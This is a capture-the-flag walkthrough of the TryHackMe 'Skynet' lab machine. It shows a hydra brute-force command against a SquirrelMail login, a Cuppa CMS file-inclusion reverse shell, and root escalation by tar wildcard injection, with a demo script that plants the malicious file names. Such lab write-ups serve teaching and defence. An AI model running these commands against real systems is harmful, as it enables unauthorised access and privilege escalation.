Skynet - THM - Braindump

There is a web server and Samba running; scan both right away, dirb against the web server and enum4linux against Samba.

The web page served is a useless search form, and there is nothing of interest in the source code either.

Anonymous listing is enabled on the Samba server, and there are some directories to examine.

Dirb returned a login form exposed under a /squirrelmail directory; the page also reveals a version number, SquirrelMail 1.4.23.

There is a known RCE for this version, but it requires valid login credentials. We probably have a username (milesdyson), but what about the password?

Meanwhile, on the Samba server we can only access a couple of things: a message saying that many passwords have been changed (so perhaps the new one is easy to bruteforce) and some logs. Logs 2 and 3 are empty, but the first one looks like a wordlist, so maybe we can use it to bruteforce the SquirrelMail login for milesdyson.

We bruteforce it with hydra. The form field names come from the SquirrelMail login page, ^USER^ and ^PASS^ are hydra's placeholders, and the string after the last colon is the failure message, so any response that does not contain it counts as a valid login:

hydra -l milesdyson -P log1.txt 10.10.92.158 http-post-form '/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.'

It works like a charm and we have credentials to log in. Before reaching for that RCE, let's take a look around inside the SquirrelMail mailbox: one of the emails contains the SMB password for milesdyson, and his share in turn contains a reference to a hidden directory called 45kra24zxs28v3yd. Let's check that out.

Running gobuster against it turns up an administrator login form revealing that this is a Cuppa CMS. There is a known exploit for it that lets us include a remote file, so we can include php-reverse-shell and get a shell as www-data.

Looking at the crontab, there is a tar job running as root over a shell wildcard (*) in /var/www/html. The shell expands the wildcard into file names before tar ever sees them, so any file whose name looks like an option is parsed as one. We just need to create two specially named files in /var/www/html, --checkpoint=1 and --checkpoint-action=exec=<command to run>, and the next run of the job executes our command as root.
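To make that last step concrete, here is an added example that is not part of the original write-up: it reproduces the wildcard injection locally in a scratch directory with GNU tar and then shows the fix. The scratch directory, the "pwned" marker file and the shell.sh payload are assumptions for the demonstration, standing in for /var/www/html and a real reverse shell; the root cron job is simulated by running the same tar command as the current user.

```shell
#!/bin/sh
# Added example (not from the original write-up). Reproduces the tar wildcard
# injection in a scratch directory and shows the fix. Assumes GNU tar on the
# PATH; the "pwned" marker and shell.sh stand in for a real payload.

# Plant the payload: a script plus two files whose names GNU tar will parse as
# options once the shell expands "*" into a list of arguments.
plant_payload() {
    dir="$1"
    mkdir -p "$dir"
    printf 'touch "%s/pwned"\n' "$dir" > "$dir/shell.sh"
    touch "$dir/--checkpoint=1"
    touch "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Report whether the payload ran ("executed" or "clean") and reset the marker.
payload_ran() {
    if [ -f "$1/pwned" ]; then rm -f "$1/pwned"; echo executed; else echo clean; fi
}

# Vulnerable job, shaped like the crontab entry in the room: "cd DIR && tar cf ... *".
# The shell, not tar, expands "*", so "--checkpoint=1" and
# "--checkpoint-action=exec=sh shell.sh" arrive as options and tar runs
# "sh shell.sh" at the first checkpoint, as whoever runs the job (root in the room).
vulnerable_backup() {
    dir="$1"
    (cd "$dir" && tar cf "$dir.tar" *) >/dev/null 2>&1 || true
    payload_ran "$dir"
}

# Fixed job: "--" ends option parsing, so every expanded name is a file operand.
# Archiving "." instead of "*" would also avoid the glob entirely.
hardened_backup() {
    dir="$1"
    (cd "$dir" && tar cf "$dir.tar" -- *) >/dev/null 2>&1 || true
    payload_ran "$dir"
}

# Demo run in a temporary directory.
demo() {
    scratch=$(mktemp -d)
    plant_payload "$scratch/html"
    echo "vulnerable: $(vulnerable_backup "$scratch/html")"   # executed
    echo "hardened:   $(hardened_backup "$scratch/html")"     # clean
    rm -rf "$scratch"
}

demo
```

The point of the hardened variant is that the file names are still the attacker's, only tar's interpretation of them changes: after "--" a name like --checkpoint=1 is just an ugly member name in the archive.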


Info steps:

  • Gathered a username, milesdyson
  • SquirrelMail 1.4.23
  • Bruteforce credentials using log1.txt, retrieved from the SMB server
  • Read emails, find the SMB password and the secret directory
  • Directory bust its subdirectories, find a vulnerable CMS
  • Exploit it with RFI, gain a low-privilege shell
  • Exploit the tar job running with wildcard expansion as root
  • Merry hacking


More from emacab98